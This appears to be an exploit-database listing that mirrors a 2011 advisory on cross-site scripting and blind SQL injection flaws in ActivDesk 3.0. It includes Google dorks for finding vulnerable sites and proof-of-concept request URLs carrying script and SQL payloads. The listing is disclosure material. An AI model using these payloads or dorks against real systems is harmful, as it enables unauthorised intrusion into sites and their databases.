header-logo
Suggest Exploit
vendor:
ActivDesk
by:
Brendan Coles
7.5
CVSS
HIGH
Cross-Site Scripting (XSS) and Blind SQL Injection
79 (XSS) and 89 (SQL Injection)
CWE
Product Name: ActivDesk
Affected Version From: 3
Affected Version To: 3
Patch Exists: NO
Related CWE: N/A
CPE: a:focalmedia:activdesk:3.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

ActivDesk 3.0 multiple security vulnerabilities

ActivDesk 3.0 is vulnerable to Cross-Site Scripting (XSS) and Blind SQL Injection. An attacker can inject malicious JavaScript code via the 'keywords0', 'keywords1', 'keywords2', and 'keywords3' parameters in the 'search.cgi' script, and can inject malicious SQL code via the 'cid' and 'kid' parameters in the 'kbcat.cgi' and 'kb.cgi' scripts respectively.

Mitigation:

Input validation should be used to prevent XSS and SQL injection attacks. All user-supplied input should be validated and filtered before being used in dynamic SQL queries.
Source

Exploit-DB raw data:

ActivDesk 3.0 multiple security vulnerabilities

# Date: 2011-06-24
# Author: Brendan Coles <bcoles@gmail.com>
# Advisory: http://itsecuritysolutions.org/2011-06-24-ActivDesk-3.0-multiple-security-vulnerabilities/

# Software: ActivDesk
# Version: <= 3.0
# Homepage: http://www.webhelpdesk-software.com/
# Google Dorks:
#  inurl:kbcat.cgi ext:cgi
#  "Help Desk Powered By ActivDesk"

# Vendor: FocalMedia
# Homepage: http://www.focalmedia.net/
# Notified: 2011-06-24 - Ticket# 67120010491


# Cross-Site Scripting (XSS):

http://localhost/[PATH]/search.cgi?keywords0=<script>alert(0)</script>
http://localhost/[PATH]/search.cgi?keywords1=<script>alert(1)</script>
http://localhost/[PATH]/search.cgi?keywords2=<script>alert(2)</script>
http://localhost/[PATH]/search.cgi?keywords3=<script>alert(3)</script>


# Blind SQL Injection:

http://localhost/[PATH]/kbcat.cgi?cid=' or substring(@@version,1,1)=5 and ''='
http://localhost/[PATH]/kb.cgi?kid=' or substring(@@version,1,1)=5 and ''='

Navigation

Suggest Exploit

Services By CQR